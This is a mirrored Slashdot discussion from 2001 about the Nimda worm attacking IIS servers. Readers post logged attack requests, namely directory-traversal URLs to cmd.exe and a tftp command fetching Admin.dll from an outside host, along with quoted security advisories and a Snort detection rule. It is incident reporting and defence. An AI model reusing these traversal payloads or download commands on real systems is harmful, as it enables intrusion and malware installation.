Slashdot Mirror
New (More) Annoying Microsoft Worm Hits Net
Here are examples of the requests it's sending:
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../
..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
While writing this story I was hit a total of 4 times, 16 GET attempts per attack. In only 4 minutes. Also of interest, My desktop has now been hit about 500 times today, all from 208.x.x.x IPs. This might be really bad. I still haven't read anything about this anywhere else, so you heard it here first ;)
Update Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!
Or is it something new?
Looks like an exploit that's been around for a while (way before CR)
Trolls throughout history:
Jonathan Swift
And it suddenly had to back up once a week after Code Red started thwacking my machine. Perhaps I should write a script to exploit the root-hack and shut down the affected machines so that the local cable circuit won't be clogged with that crap. I can't imagine how bad this will get.
It's not like @Home (in my area) is doing *anything* to stop this. I really think that they should be policing for such disruptive activities and informing their customers when unsecured machines on their network are comprimised.
STOP MISUSING APOSTROPHES, YOU MORONS!!!
My mail server is down already. Thanks for this new virus in the wake of such a tragedy.
I'm seeing massive numbers of timed out requests on my sytems this morning. It started at exactly 9:06 eastern time.
I checked one of the IPs and it said 'Fuck USA Government, Fuck PoisonBOx' and opened a second window with what looked like a MIME buffer overflow attempt. I run Opera on Linux so it didn't effect me. It looks like we may be getting hit in a shotgun approach. My systems are in the 207.227 range and 208.
Brian
Remember Lexington Green!
The 208.x.x.x is similiar to Code Red in that it attempts to scan local subnets (I bet you are have a 208.x.x.x IP); therefore, naming it 208 is only good for those in your Class A. We have received attempts from over 100 hosts infected with the Code Red 2 worm, starting from the local class C, then class B, and now class A and others. It appears to be attempting to find rooter servers, for what purpose I can only imagine.
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c 1%1c../..%c1%1c../winnt/system32/cmd.
--
"It is now safe to switch off your computer."
I wonder what part of the registry is mailed. Passwords+usernames of outlook? Or are all of these in pwl-files these days?
www.vanheusden.com - home of Multitail, HTTPing, CoffeeSaint, EntropyBroker, rsstail, bsod, listener, nagcon, nagi
Yeah.. While I'm on Win2K and running a web server, it would never occur to me to run IIS. My logs are totally filled up with traces of this new worm. The logs also include lines such as this (IP censored).
/scripts/root.exe?/c+tftp%20-i%20212.163.x.x%20GET %20Admin.dll%20Admin.dll 212.163.x.x
GET
Interesting..
On the upside, I haven't had a single hit by Code Red in the past hour or so! Let's hope this one is nasty enough to get the people to finally shut down / fix their boxes!
Why won't someone port these to linux? Microsoft Operating Systems seem to have a monopoly in this field. For now, if you read this in a *nix, just portscan your netmask and a few others and try a few old wu-ftp exploits.
"You have new mail, you open it. Your server begins port scanning every box on the internet. Do the server's mind? Of course not, they have nothing better to do." - New Microsoft Ad?
Chaos, Mayhem, and Destruction: Not
This kinda stuff isn't nice for unix servers either. I have both FreeBSD with Apache and Linux with Tomcat doing stuff and every time a worm like this comes along, my stuff drags to a halt and occaisionally crashes (if my app server is set up in a fragile way). At least I won't be perpetuating this one though.
Helping with organizational effectiveness is our job.
Well if you're still vulnerable to those exploits then you should've turned them off months ago...
So the patches MS sent out didn't stop this new one? I thought they said they had solved that type of problem... I just love MS.
~ now you know
Right. Corporate won't mind. I'll just pull the plug.
If its scanning subnets, this could very well explain why I cant reach my machine at home (Roadrunner).
Its probably generation a sh*tload of traffic.
Can anyone on 24.x.x.x verify?
Snort has been going nuts this morning. I am getting about the same results. Although, in my case, the attacks are coming from 63.x.x.x, which is the same /8 as I am on.
From here, it looks like a variation on Code Red. Should be an interesting morning.
Jeremy
Hi-Technical Excellent Taste and Flavor!
This is just some script kiddie trying to exploit the holes that Code Red previously opened up. Unless you see it coming from different IP subnets, the likelyhood of this attack being a worm is nearly zero.
AC
http://slashdot.org/comments.pl?sid=21429&cid=2314 500
News for Nerd, Stuff Which Moderators Decide Matters.
I noticed that this morning on my various IDS's and was going to post on OT message in another story to see if it was affecting many people.
I get them from inside the local net.
I can't believe this stupid Code Red crap is still going on. I've gotten used to the constant hits. And now am I going to have to get used to this junk?? Argh! I'm just firewalling them off as they hit.
Security focus has some information on it, we're seeing shedloads of hits at the moment :(
-- The Flying Hamster
Looking at the code red virus it was obvious it was going for a hole in the indexing server.
What's this one going after?
Just IIS web server itself?
It'd be almost amusing if this was just some script kiddie with a bunch of zombies trying to cause a virus "scare" (ie hitting a bunch of boxes with a peculiar looking URL, making everyone think it's a worm).
I'm not saying it's not a virus, just it would be amusing...
1300 hits so far. Each infected machine seems to be making a LOT of attempts.
Here we go again...
Here is how it is done:
Tools>Options>Security>check "Do not allow attchments to be saved or opened that could potentially be a virus"
The attacks look a lot like the DoS.Storm worm that appeared on the scene June 2001. Either it's a new outbreak of DoS.Storm, or a modified version
Symantic has info on DoS.Storm here
SANS incidents.org has more details here
-jazon
This is our Cry, This is our Prayer: Peace In The World
-Sadako Sasaki Peace Memorial, Hiroshi
All of the hits I'm getting are coming from 64.x.x.x machines. Most are coming from 64.90.x.x. My own subnet falls within 64.90.x.x, so maybe the worm attacks near machines first. Of course, /. is also inside 64.x.x.x...
I am seeing these hits too. Since 18/Sep/2001:07:27:25 -0600 (it is now 09:16) I have been hit by 120 different machines. 105 of them are on my class B, 128.138, 14 more just start with 128, and only one is from a totally different address.
Perhaps I should contact the admins at my site who are in charge of the offending machines.
I see it looking for the exploit Code Red used, trying out MSADC and a directory traversal exploit.
My money's on the Code Red worm being retrofit yet again to try and execute a few more tired old exploits. Which is to say hopefully Hotmail and Windows Update won't get rooted again.
Haven't heard anything about it on Bugtraq yet; haven't checked Incidents (securityfocus.com isn't chugging along so speedily).
It'll be interesting to see how many boxes this roots out in the light of increased press coverage of Code Red and MS's spate of security-minded tools out there. Or: how good do people feel about that leaky dam now that they've stuck their thumb in the hole labelled "Code Red"?
Easy does it!
This comment has been submitted already, 276865 hours , 59 minutes ago. No need to try again.
Wow - I've got about 1000 similar hits in my logs, starting from around 6.30am this morning. From a variety of different IP addresses.
63.73.31.242 just hit me 16 times.
Going to http://63.73.31.242 indicates:
"National Aerospace Documentation Home Page"
and attempts to launch a "readme.exe" executable immediately.
Just checked another site: 63.168.150.72 - plain old IIS page, but attempts to launch the same executable.
So, we have Code Red, with an added attempt to launch a (no doubt) malicious executable from infected pages.
Damn. I just got an e-mail from my ISP (corporate LAN/WAN) telling us of this. Here's their text:
~~~~~~~~~~~~~
Many ISPs, including [ISP], are under attack by a new worm that appears to be related to the recent CodeRed worm. This worm attacks Microsoft web servers via a known vulnerability and seeks to replicate itself by searching for other vulnerable servers.
The traffic caused by this worm has caused severe network problems worlwide this morning (18 Sep 2001) according to many ISP-related mailing lists. More information will be sent to this announcement list as it becomes available.
~~~~~~~~~~~~~
OK, so they say it's a Code-Redish bug. According to Taco's post, it's not even close (sort of).
I'm using *NIX/Apache.
I'm not gonna worry about this one (yet again...). Y'all with them damn Win boxes keeping the Internet flooded with this sort of junk, PLEASE either shut of your machines, or get a real OS...
(or at least, apply the damn patch already)
I'm not a prophet or a stone-age man,
I'm just a mortal with potential of a super man.
Evidence from compromised boxes elsewhere on campus seems to indicate that this bug will create a ton of *.eml files on the computer and they are all about 78k. Wehaven't received an .eml file in hand yet, to view the contents. A variety of .eml files are created, including "desktop.eml",
"readme.eml", etc.
A compromised system will attach a readme.eml file to the bottom of all web pages served. This is because there is currently a bug out for IE5 that will auto execute any given .eml file.
Need a UNIX/Linux/network guru in the Boulde
If they're using all-new exploits, it may be that there ISN'T a patch to apply. Furthermore, getting Windows users to apply patches is spotty at best- users often don't even realize that they're running a web server on their box.
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
Anyways here's the sequence of attempts it makes, trying to capitalize on old worms that weren't cleaned up properly, as well as known unicode exploits.
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:21 *.*.*.* GET
2001-09-18 15:10:21 *.*.*.* GET
2001-09-18 15:10:21 *.*.*.* GET
2001-09-18 15:10:21 *.*.*.* GET
Furthermore every attacking system was in the same 255.0.0.0/8 as the target system so it appears to target in the same "Class A" address (of course in this case it's 216.x.x.x so it's not really Class A, but you get the point).
When the dir command succeeds (or rather, when the worm believes it has succeeded), the next request has a tftp command embedded in it which attempts to install a file called Admin.dll. Following that, there is a request for the dll itself, which presumably kick starts the worm.
I'll take a look at Admin.dll later today.
I like to play children's songs in minor keys.
"We're all sons of bitches now." --J. Robert Oppenheimer
If those boxes cause you a problem (lost time, lost work, lost bandwith, distress, ...) you have every right to sue the operators of these (unattended?) boxes.
You might also ask their ISP's to shut down their internet connection for these reasons. If they dont comply sue them.
You do live in the U.SA. don't you?
Yeah, just started on 24 /8 this morning at exactly 9:30am est
Hello Kettle,
You, my friend are as black as pitch.
With love, Pot.
Is it just a coincidence? I doubt it.
I noticed the activity light on my cable modem (charter communications @home) was on constantly - ran tcpdump and it's all these "who has x? tell y" arp queries (nameserver lookups), just like with code red.
Leigh Orf
A squid eating dough in a polyethylene bag is fast and bulbous, got me?
The 'Fuck PoisonBox' you're getting is due to the Sadmind virus.
o r.sadmind.html
More at:
http://www.symantec.com/avcenter/venc/data/backdo
my firewall ain't pleased.
I didn't think of Code Red stuff since my mind's been on the WTC stuff and potential war.
Isn't it interesting that everything nasty happens in just a short period? At least I know why my net has been crawling so badly.
Which fix all future bugs before they happen. Hello?
With 1,000 easy reasons to not use MS, you decide to MAKE ONE UP? Sheesh....
It is really cool to see everyone giving their experiences and trying to pull together to figure this one out. It won't be long until a slashdotter gets to the bottom of this one.
I received mail with a readme.exe and txt.exe attachments.
b servicesuntitled - 1ultrabudgetciscostuffconsoleapplication2pitou-0co nsoleapplication2_debug
The sending address was from jleo@arcgny.org with the subject line:
ware\Microsoft\WindoJb4 "supertrak66bclass11_28hlaconsoleapplication2data consoleapplication1consoleapplication1supertrak66
.Searching for the address brought up the 2600 website with a Support Message for the WTC.
A quick traceroute returned:
16 172 ms 187 ms 125 ms adsl-65-66-34-57.dsl.stlsmo.swbell.net [65.66.34.57]
A little more info found returned:
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:
I have yet to scope the file.
I am me...I think
If there's a patch, they should have applied it (If it breaks things, well, perhaps Windows isn't something they should be using...). If the patch doesn't fix this, they should be screaming at MS. If this is a new exploit maybe they should be screaming at MS and checking into a new system design...
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
Gues he has it in for the U S og A =)
Symantec has an article on Code Blue. This might not be it.. but it's a lot like it from what I can tell.
visit my free wallpaper collection, wp.erasei.com
Hey I'm on 24.154 and I didn't notice any latency when SSHing in to home. (Coming from a 208 at work, btw)
We dance to all the wrong songs.
--Refused.
I'm on a cable network, 24.x.x.x...
/usr/local/httpd/htdocs/scripts/..Á{../winnt/syste m32/cmd.exe
/usr/local/httpd/htdocs/MSADC/root.exe
/usr/local/httpd/htdocs/msadc/..%5c../..%5c../..%5 c/..Á{../..Á{../..Á{../winnt/system32/cmd.exe
My logs are getting swamped, with as many as 55 hits from a single IP in minutes.
"File does not exist:
File does not exist:
File does not exist:
running a search script on "cmd.exe" in my apache error.log tells me:
ip is 24.124.x attempts is '22'
ip is 24.124.x attempts is '11'
ip is 24.252.x attempts is '11'
ip is 24.69.x attempts is '11'
ip is 24.232.x attempts is '11'
ip is 24.124.x attempts is '11'
ip is 24.124.x attempts is '9'
ip is 24.162.x attempts is '9'
ip is 24.124.x attempts is '15'
ip is 24.93.x attempts is '11'
ip is 24.124.x attempts is '36'
ip is 216.198.x attempts is '1'
ip is 24.124.x attempts is '44'
ip is 24.124.x attempts is '1'
ip is 24.16.x attempts is '1'
ip is 24.124.x attempts is '2'
ip is 24.37.x attempts is '2'
ip is 24.164.x attempts is '5'
ip is 24.0.x attempts is '11'
ip is 24.124.x attempts is '11'
ip is 24.1.x attempts is '22'
ip is 24.124.x attempts is '22'
ip is 24.161.x attempts is '11'
ip is 24.6.x attempts is '11'
ip is 24.124.x attempts is '55'
ip is 24.124.x attempts is '22'
ip is 24.124.x attempts is '22'
ip is 24.124.x attempts is '33'
This is just from this morning, starting in the wee hours and still continuing as I write.
first hit: 5:25:07 GMT
/var/log/apache/error.log | cut -d " " -f 8 | cut -d ] -f 1 | uniq | wc -l
grep winnt
27 hosts
All the hits are from my class A
looks like I got a few this morning. all from 65.102.x.x
Do all these boxes doing the scanning seem to be patched from the exploit themsevles?
Stupid thing also dumps files all over the network. It got into our net about two hours ago, and began to spew ".eml" files all over the place, on every machine on the subnet, one in every subdirectory it could find. (Where is the name of some real file on the system.) The contents are a readme.exe file, which is MIME-encoded to say that it's a WAV file. My guess is that, if you click on the .eml file, it launches things anew...
Snort has been picking this up as IDS297 (directory traversal) and 102:1:1 (ISS Unicode attack) at our location since about 9:00am EDT.
We are seeing very heavy activity (not as bad as Code Red) since then.
From NTBugTraq
w32.nimda.amm
Just wait till some crappy band steals your nic.
I contacted UUNET (My T1 provider) and they told me it was a strain of Code Red. It seems to be everywhere. I have isolated a few dozen IP's from my logs already. I have contacted the web admins of the sites in question as well. I am getting about 100+ hits a minute now, utilizing about 10%-20% of the T1 the main webserver is on. I'm guessing this will be a problem for everyone, even if your not running IIS, or your server is patched (like mine), the hundreds of scans can eat your bandwidth away regardless.
-S
-Sternn
When trying to access a couple of the attacking sites, I get a download of a file called wbk832.tmp and a second IE window opens with the URL of mhtml:http://xxx.xxx.xxx.xxx/readme.eml
This looks like a bad one. Anyone have any ideas?
Hi-Technical Excellent Taste and Flavor!
There have been numerous reports of IIS attacks being generated by
/scripts and
/c and /d virtual
/scripts directory), please forward me a copy of that .dll
machines over a broad range of IP addresses. These "infected"
machines are using a wide variety of attacks which attempt to exploit
already known and patched vulnerabilities against IIS.
It appears that the attacks can come both from email and from the
network.
A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no
text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not
quite right with an email.)
The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the
/msadc directory, as well as an attempt to use the
roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.
One thing to note is the attempt to execute TFTP.EXE to download a
file called ADMIN.DLL from (presumably) some previously compromised
box.
Anyone who discovers a compromised machine (a machine with ADMIN.DLL
in the
ASAP.
Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
the following;
edit %systemroot/system32/drivers/etc/services.
change the line;
tftp 69/udp
to;
tftp 0/udp
thereby disabling the TFTP client. W2K has TFTP.EXE protected by
Windows File Protection so can't be removed.
More information as it arises.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
Just started getting these in the last two hours, all from 195.x.x.x addresses.
OK. So I'm running Apache, which shrugs them off, but they're wasting our crap bandwidth and stuffing our web server logs!
I tried looking at the websites - many of them had some kind of default screen, indicating an unused IIS installed by default/mistake.
"Information wants to be paid"
apache_1adminconfig
fontsmrtns2
apacheroutedelete
hpfontsmod_perl-1
gettime
big-sister-0
apachejmeter_1
pdfwritr
apache-contrib1lo66293
routedelete
autoexec
apachejmeter_1mod_phantomimap
No ideas...got me what it's doing.
I've been getting these, as well as SirCam messages, the "Hi! How are you? I send you this file to ask for you advice..." with ATT0000059.TXT, a 59-byte file, and ATT0000059.DAT, 159KB that looks like it contains some type of executable code.
I've also gotten the snippits of the registry:
"ware\Microsoft\Windo,b4 pull123"
Anyone have any ideas about this? I haven't opened anything except the messages, and Windows 2000 is pretty secure, but I'd rather not get infected with something if possible.
Don't be a dink, man.
We are all upset about what the Terrorists did. But you don't have to be a wiener to a bunch of innocent people.
Aside from the Code Red usual suspects who've been hitting my server, I've seen a shitload of these, too.
It doesn't even have a cool name yet. feh.
What we call folk wisdom is often no more than a kind of expedient stupidity.-Edward Abbey
I heard some Hacker groups where planning cyberwar against Afganistan and Iraq, then they will be needing loads of machines.
Dont know but this could be related.
Quazion.
-----BEGIN PGP SIGNED MESSAGE-----
/scripts and /msadc directory, as well as an attempt to use the /c and /d virtual roots to get to CMD.EXE). Further, it attempts to exploit numerous other known IIS vulnerabilities.
/scripts directory), please forward me a copy of that .dll ASAP.
M DU ChVqn6yReQXqEH
J Uu pDHB1Yy1DY/po6
a mK I2eqd4TdE0yfIO
There have been numerous reports of IIS attacks being generated by machines over a broad range of IP addresses. These "infected" machines are using a wide variety of attacks which attempt to exploit already known and patched vulnerabilities against IIS.
It appears that the attacks can come both from email and from the network.
A new worm, being called w32.nimda.amm, is being sent around. The attachment is called README.EXE and comes as a MIME-type of "audio/x-wav" together with some html parts. There appears to be no text in this message when it is displayed by Outlook when in Auto-Preview mode (always a good indication there's something not quite right with an email.)
The network attacks against IIS boxes are a wide variety of attacks. Amongst them appear to be several attacks that assume the machine is compromised by Code Red II (looking for ROOT.EXE in the
One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box.
Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the
Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the following;
edit %systemroot/system32/drivers/etc/services.
change the line;
tftp 69/udp
to;
tftp 0/udp
thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows File Protection so can't be removed.
More information as it arises.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2
iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVM
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVY
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQj
hSW7yN2lhJc=
=YAwc
-----END PGP SIGNATURE-----
Arse? When did you move to England (or Ireland), Rob?
I timed out trying to get to the link. /.ed, or DOD?
science is a religion
Just when I was hoping my cable company would unblock my HTTP port (which they said was "temporary"). Unfortunately, this will give them more fuel to make it permanent.
The HTTP port doesn't bug me as much as they have also blocked my mail port.
Question for sendmail experts out there, related to this: I'm currently using another system to tunnel my mail to my box on my cable modem. It works great, but a side effect is that it looks like all mail is coming from "localhost", which defeats the anti-Spam measures. Of course, it didn't take long for the cockroaches to find my mail server and use it for relaying. I've been fighting it by blocking specific subnets, but it's an annoying battle. Any suggestions?
Sometimes it's best to just let stupid people be stupid.
Add this to your in-house SnortRules file.
alert TCP $EXTERNAL_NET any -> $HOME_NET 80 (msg:"AfterRed Worm"; flags: A+; content: "/cmd.exe"; nocase;)
echo '[q]sa[ln0=aln80~Psnlbx]16isb572CCB9AE9DB03273snlbxq' |dc
Declaring "cyberwar" on Afghanistan is a lot like threatening to blow up Kabul's world trade center.
Oh, they don't have one? Exactly.
I'd imagine most "cyberwar" would focus on Pakistan, but they're helping us already.
What we call folk wisdom is often no more than a kind of expedient stupidity.-Edward Abbey
Those machines must have a lot of probe threads running -- I got hit by a site at 8:47 and again at 10:25. (Or else the random number generator in the worm is bad.)
... I can't even get a ping through.
My DSL to home is completely swamped
Email: slashdot3@FreeMars.org (Address will be abandoned when it gets spam.)
I noticed the same thing in my web log this morning. I think it not only affects IIS, but I think it will also affect Apache servers running Micro$oft FP Extensions, as the /scripts/ and stuff its pointing to are all apart of the extensions. IT does also try to exec. some windoze only files. But personally, its gonna be bigger then we all think it will be...
Between EDT 09:35:32 and 11:04:03, my web server was hit by 38 unique IP addresses with the same pattern. I sent a report to cert@cert.org, but I guess I should have checked Slashdot first!
/scripts/root.exe?/c+dir HTTP/1.0"
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
/default.ida script to send a warning email directly to the smtp port of the infected host! Who wants to write an Apache module to detect and send advisories to the infected host's admin?
It starts with:
"GET
and ends with:
"GET
After checking a handful of the originating hosts, I found some were running Microsoft-IIS/4.0 or Microsoft-IIS/5.0 on port 80, but most were blocking port 80.
And to think I was just putting finishing touches on my
I'm a little annoyed. I was hoping for a less eventful Tuesday this week. My home server is crawling because of all the requests that it's rejecting. At least the Winbloze servers that I have to maintain aren't showing signs yet (something about being on a closed network).
I was getting this error when I clicked the article: Nothing for you to see here. Move along.
At the height of code red I was getting ~60 hits a day. This beast has hit my system over 3000 times today.
Yow.
There's more to it than this.
Can someone wget it and post it in a gzip or zip format on their website?
Does anyone know how useful (useless) the new Windows XP firewall is at stopping these sort of things? I doubt it does anything, but what about products like Zonealarm? Personally, I think that the best way to limit these sort of attacks is by getting home users to install some sort of firewall (and there are some rather idiotproof ones out there). Although, if the firewall comes up with something like "StupidObviousVirus.exe wants to connect to the Internet. Allow?", most people will still click 'OK', not knowing what they are doing.
I just samspaded one of the IP's thats been hitting our site. it places a bit of javascript code at the bottom of the page that basically forces IE to download readme.exe. DO NOT TRY TO GO TO AN INFECTED IP ADDRESS.
Browsers like Opera (and, I assume, Netscape) view this as a plain-text document, but MSIE takes that EML file and treats it like an Outlook email... which means it uses the Outlook security settings, -and the recently discovered Outlook version 6 security hole-, I believe.
If that "readme.exe" file does what I think it does... You can figure it out from there. I suggest somebody grab the README.EML file and dissect the fucker.
-- Christian Wagner ( cwagner at io.com )
...And shut down port 80 completely :-P It looks very unprofessional when one's url ends in ":90" :-(
I can only show you the door, you must be the one to walk through it.
If we really are seeing a marked increase in worm traffic (and it's not just everyone suddenly noticing, now that others have brought it up -- just being cautious, eh?), then could it be possible that this might be part of, or a prelude to, a DDOS attack?
The NIPC issued the following advisory: Potential Distributed Denial of Service (DDoS) Attacks on Monday, talking about reports of people preparing for DDOS attacks on computer and commerce infrastructures. In particular: On September 12, 2001, a group of hackers named the Dispatchers claimed they had already begun network operations against information infrastructure components such as routers. The Dispatchers stated they were targeting the communications and finance infrastructures. They also predicted that they would be prepared for increased operations on or about Tuesday, September 18, 2001.
Of course, this could just be an ill-timed release of yet another worm (like there're "well-timed" releases?). I just thought that this was particularly spooky, reading this alert after seeing this worm story...
I don't have these problems, I use Linux exclusively.
It appears that this new worm is appending the following JavaScript snippet to all pages that the server sends:
Not sure what this JavaScript is suppose to do, but it's there none the less.
- Matt
Anyone know how we can block these requests?
UNIX/Linux Consulting
Still have access to one of the systems i used to run at my alma mater. im getting SCREENFULLS of logs scrolling by, super fast. Many many hits.
This looks bad.
I got it from 132.254.96.22. I'm on 132.69.xxx.xxx.
Make even shorter URLs - 8LN.org
I noticed it on my own server before I heard about it here.
/etc/apache/logs/access_log|wc
/etc/apache/logs/access_log|head -2
/scripts/root.exe?/c+dir+ HTTP/1.0" 404 210 "-" "-" 0 web.feather.net
/scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-" 1 web.feather.net
Some stats gleaned from my log file:
6-falcon [Tue 18Sep2001] 8:37AM ~ 12% grep c+dir
678 9492 104249
6-falcon [Tue 18Sep2001] 8:37AM ~ 13% grep c+dir
****.linuxwa.com.au - - [10/Aug/2001:23:51:16 -0700] "GET
::ffff:216.99.110.** - - [18/Sep/2001:06:09:40 -0700] "GET
Apparently it was first discovered some time ago, but just recently got so hideously infectious...
take a look at http://208.37.171.156/
i was hit 215 times in an hour, this being one of the sources.
My no means am I a windows advocate, but I do want to say that all the windows bashing is a bit hypocritical. Everyone acts like this couldn't happen on *NIX. Remember the Internet Worm? (I don't, I'm too young, but still). Sure, the recent strain of worms are for windows, but couldn't the same thing happen with say.. oh.. I dunno bind or sendmail? Two programs that lots of systems run that AFAIK have never had a version without SOME kind of security hole. This isn't a case of one OS being better than another. It's a case of BAD (read: insecure) PROGRAMMING. Just my two cents.
This worm hit my NT box - despite all of M$ security patches being installed. Some of the changes I have noticed.
Any requests to the webserver serving the machines primary domain name (but not it's aliases) will also send a file called "readme.exe" with the page - I haven't run the file but neither Norton or Fsecure recognise it a a virus. Also in the root of said webserver it places a file called readme.eml (an outlook email message) which is a mime message containing the file readme.exe
Axxter
Right move everything to nix. I can have that done by Friday. Did you get the memo??
We are getting reports of this on the DShield mailing list as well as from my own home firewall. I am using portsentry, so all the ips are being banned after the first attempt, but I'm still getting hits on port 80 roughly every 5 minutes, but they're from all over the place, not just 208.x.x.x. I mean everywhere. My server reports are going nuts, I usually get maybe 1-2 an hour, but now I'm getting 1 literally every 4-5 minutes.
It attempts to download a file called admin.dll which from from I can determine is from frontpage extensions to use as a exploit. The readme.eml will copy the file to desktop.eml or sample.eml in any directories that it can find on your computer or network computers nearby. The directories it seems to copy the files into are anything with "games" (possibly "game") or "MP3" ( it went to both MP3s and MP3). It also copies the file into your favorites.
The virus checkers don't seem to spot this file and it would be incredibly unwise to run the blighter.
HTH
Richard
im on the @home cable network (24.xxx.) ive recieved about 500 hits in the past half hour all the @home network. ive compared these hits witht he logs of code red hits and they are coming from most of the same ip's. i called comcast@home and they said they are "working on the situation". i agree with another post that they should shut down the infected boxes and mail the user explaining why. it is well within their rights. but i guess their too busy fighting bankruptcy. I wonder what kind of news headlines this would be making if the tradegy in new york never happend?
Yes, my machines (on RR) are getting pounded as well. It seems to act a bit like Code Red in the manner in which it spreads, but is attempting to exploit a greater number of bugs.
-- Minds are like parachutes... they work best when open.
Some of the lines from the registry it tries to import:
e rs \Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0
SYSTEM\CurrentControlSet\Services\Tcpip\Paramet
Search for 'Concept Virus' to see if you're infected, I guess.
I'm getting hits from all over campus. So far 221 attacks, though it looks like i'm getting multiple blocks of hits from each host.
The first such attack in my logs was at 1333 GMT (0833 CDT). All attacks are within my class B so far (206.230). There seem to be a few hundred of them so far, and the DSL line I share with the rest of my apartment building is getting a bit sluggish.
Another machine I have on another class B (128.46) started getting hit around the same time, but not all of its attacks are from within the subnet.
--mdp
I just did a search on readme.eml at google
and looky what i found, also
it appears the ips i've noticed again at 9:06 till
@ 9:14 where quite popular in peoples logs according to another google search done on those address
..
at
http://www.google.com/search?q=cache:xlKKXWt_UC
a google cached document i found the internals of
the email...
Taco would've know about this months ago. It was annouced here.
CERT has a mention of this under Increased Port scanning activity.
This is spreading like mad. I've already got 1042 hits from this thing. Geeze, running M$ on the Internet is a liability. We have sin taxes, why not M$ taxes?
More info from F-secure about the virus
Seen any BadMarketing lately?
My server got hit 800 times by 189 unique hosts so far. Ehmm. Make that 191 while writing this message....
Roger.
I'm at 572 hits from this one in just under a couple hours. Damn. It took Code-Red 2 days to get that high on my box...
Oh, Taco: ALL of them are from the 216.x.x.x range...
I'm not a prophet or a stone-age man,
I'm just a mortal with potential of a super man.
I got up this morning and the send/receive light on my Comcast/@home cable modem was having a fit.
Surely Code Red isn't back in full force?
Well...I guess so. Shoot.
Thank goodness I am not running Windows(alpha-numberic soup) as my server.
Linux seems to be a pretty good anti-virus for some things. Eh, Steve..?
- Life is what keeps you occupied while you are waiting to die
My wife called from home saying, "Something is putting EML files all over my computer...(pause)...and yours too"
I am running IIS on win2k, have applied the code red patch. Note: I am building the Linux/Apache server RIGHT now, so IIS is on the way out. But if anyone has any idea how this is happening, I'd love the info.
Looks like this thing kicked off almost excatly one week after the WTC stuff.
Krispy Cream is people
Just got word from a friend who works in the Anti-Virus market. The working title for this is W32/nimda.a they are working on it obviously...
J-aims
--
Yo, whatever happened to peas? Join T( H)GS
Wouldn't it make buffer overruns harder if stacks grew the other way? Is there a reason why a stack can't go upwards?
TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm
Date: September 18, 2001
Time: 1000 EDT
RISK INDICES:
Initial Assessment: RED HOT
Threat: VERY HIGH, (rapidly increasing)
Vulnerability Prevalence: VERY HIGH, effects IIS servers version 4.0,
5.0, and internal networks.
Cost: High, command execution is possible
Vulnerable Systems: IIS 4.0 and 5.0
SUMMARY:
A new IIS worm is spreading rapidly. Its working name is Nimda:
W32.nimda.a.mm
It started about 9am eastern time today, Tuesday,September 18, 2001,
Mulitple sensors world-wide run by TruSecure corporation are getting
multiple hundred hits per hour. And began at 9:08am am.
The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for
multiple vulnerabilities including:
Almost all are get scripts, and a get msadc (cmd.exe)
get_mem_bin
vti_bin owssvr.dll
Root.exe
CMD.EXE
../ (Unicode)
Getadmin.dll
Default.IDA
